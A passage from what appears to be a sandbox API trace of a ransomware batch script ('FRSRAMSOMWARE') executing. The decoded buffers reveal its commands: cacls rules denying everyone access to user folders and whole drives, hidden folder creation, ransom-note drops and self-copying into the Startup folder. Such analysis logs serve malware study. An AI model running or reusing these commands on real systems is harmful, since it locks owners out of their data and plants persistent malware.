y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0088.934] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.934] GetFileType (hFile=0x34c) returned 0x1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0088.934] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0088.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0088.934] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.934] GetFileType (hFile=0x34c) returned 0x1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0088.934] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0088.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0088.934] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.934] GetFileType (hFile=0x34c) returned 0x1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0088.934] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0088.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0088.934] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.934] GetFileType (hFile=0x34c) returned 0x1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0088.934] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0088.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0088.935] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.935] GetFileType (hFile=0x34c) returned 0x1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0088.935] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0088.935] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0088.935] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.935] GetFileType (hFile=0x34c) returned 0x1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0088.935] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0088.935] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0088.935] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.935] GetFileType (hFile=0x34c) returned 0x1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0088.935] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0088.935] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0088.935] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.935] GetFileType (hFile=0x34c) returned 0x1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0088.935] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0088.935] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0088.935] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0088.935] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.935] GetFileType (hFile=0x34c) returned 0x1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0088.936] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0088.936] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0088.936] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.936] GetFileType (hFile=0x34c) returned 0x1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0088.936] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0088.936] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0088.936] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.936] GetFileType (hFile=0x34c) returned 0x1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0088.936] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0088.936] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0088.936] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.936] GetFileType (hFile=0x34c) returned 0x1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0088.936] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0088.936] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0088.936] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.936] GetFileType (hFile=0x34c) returned 0x1 [0088.936] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0088.936] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0088.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0088.937] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.937] GetFileType (hFile=0x34c) returned 0x1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0088.937] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0088.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0088.937] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.937] GetFileType (hFile=0x34c) returned 0x1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0088.937] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0088.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0088.937] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.937] GetFileType (hFile=0x34c) returned 0x1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0088.937] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0088.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0088.937] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.937] GetFileType (hFile=0x34c) returned 0x1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0088.937] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0088.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0088.937] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0088.938] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.938] GetFileType (hFile=0x34c) returned 0x1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0088.938] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0088.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0088.938] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.938] GetFileType (hFile=0x34c) returned 0x1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0088.938] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0088.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0088.938] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.938] GetFileType (hFile=0x34c) returned 0x1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0088.938] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0088.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0088.938] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.938] GetFileType (hFile=0x34c) returned 0x1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0088.938] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0088.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0088.938] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.938] GetFileType (hFile=0x34c) returned 0x1 [0088.938] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0088.939] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0088.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0088.939] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.939] GetFileType (hFile=0x34c) returned 0x1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0088.939] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.939] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0088.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt 